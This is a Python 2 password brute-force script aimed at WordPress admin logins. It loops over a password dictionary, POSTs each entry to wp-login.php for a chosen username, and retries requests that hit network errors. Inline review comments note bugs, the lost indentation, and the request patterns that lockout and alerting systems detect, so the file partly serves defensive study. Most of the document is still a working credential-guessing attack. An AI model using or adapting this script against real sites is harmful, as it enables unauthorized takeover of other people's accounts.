#!/usr/bin/env python
#Coding = UTF-8
# WordPress admin login brute force (Python)
#python wordpress_bruteforce.py http://xxxx.com/wp-login.php xxxx dic.txt
import urllib, time, sys
# Wall-clock timestamp taken when the script starts; later prints subtract it
# to report elapsed seconds.
start = time.time()
# Dictionary lines whose request raised IOError; the __main__ section below
# iterates this list to send them again.
errors = []
# Send one login POST to `url` for each line of the `dictionary` file.
#   url        -- login endpoint (the usage comment shows a wp-login.php URL)
#   name       -- value submitted in the 'log' form field
#   dictionary -- path of a file read line by line
# Returns nothing. When a response body is empty it prints the line and the
# elapsed time, then exits the process via sys.exit().
# NOTE(review): indentation was lost in this copy, so nesting is read from
# statement order only.
# Defensive view: on the wire this is a sequential run of POSTs carrying the
# fields log/pwd/redirect_to from one client, with no delay between attempts,
# which is the pattern that login rate limiting, account lockout and
# failed-login alerting are meant to catch.
def exploit(url, name, dictionary):
# The file object is never closed explicitly.
for line in open(dictionary):
# NOTE(review): `lineline` is assigned but never read; the calls below use the
# raw `line`.
lineline = line.strip()
try:
# `line` still carries the file's line terminator, so for every newline-ended
# line the encoded pwd value ends in %0A (or %0D%0A), a distinctive marker in
# captured request bodies.
data = urllib.urlencode({'log':name,'pwd':line,'redirect_to':''})
# Passing `data` makes Python 2 urllib.urlopen issue a POST. No headers are set
# here. NOTE(review): presumably this goes out with urllib's default
# Python-urllib User-Agent; confirm against server logs.
content = urllib.urlopen(url, data)
# Success heuristic: an empty response body is treated as a valid login.
# NOTE(review): nothing on this page shows that the target answers that way.
if content.read() == '':
print "Password is : %s" % line
print time.time() - start
sys.exit()
else:
print "try %s failed" % line
# Network-level failure: remember the line so it can be sent again later.
except IOError:
errors.append(line)
print "try %s occurs IOERROR, add to list and retry it later" % line
# Script entry point: requires three arguments (login URL, account name,
# dictionary path) and prints a usage line otherwise.
if __name__ == "__main__":
if len(sys.argv) < 4:
print 'Usage: Url AdminName Dictionary'
sys.exit(1)
exploit(sys.argv[1], sys.argv[2], sys.argv[3])
# Retry phase: repeats the same POST and empty-body check for the lines that
# exploit() recorded in `errors`.
# NOTE(review): `errors` is deleted from and appended to while enumerate() is
# iterating it, so entries can be skipped or revisited. With indentation lost,
# the exact nesting of `del errors[i]` cannot be confirmed from this copy.
while errors:
for i,line in enumerate(errors):
try:
data = urllib.urlencode({'log':sys.argv[2],'pwd':line,'redirect_to':''})
content = urllib.urlopen(sys.argv[1], data)
if content.read() == '':
print "Password is : %s" % line
print time.time() - start
sys.exit()
else:
print "try %s failed" % line
del errors[i]
# A repeated IOError appends the line again and nothing visible here removes the
# earlier entry. NOTE(review): the list may therefore never become empty;
# verify.
except IOError:
errors.append(line)
print "try %s occurs IOERROR, add to list and retry it later" % line
# Elapsed seconds since `start`.
print time.time() - start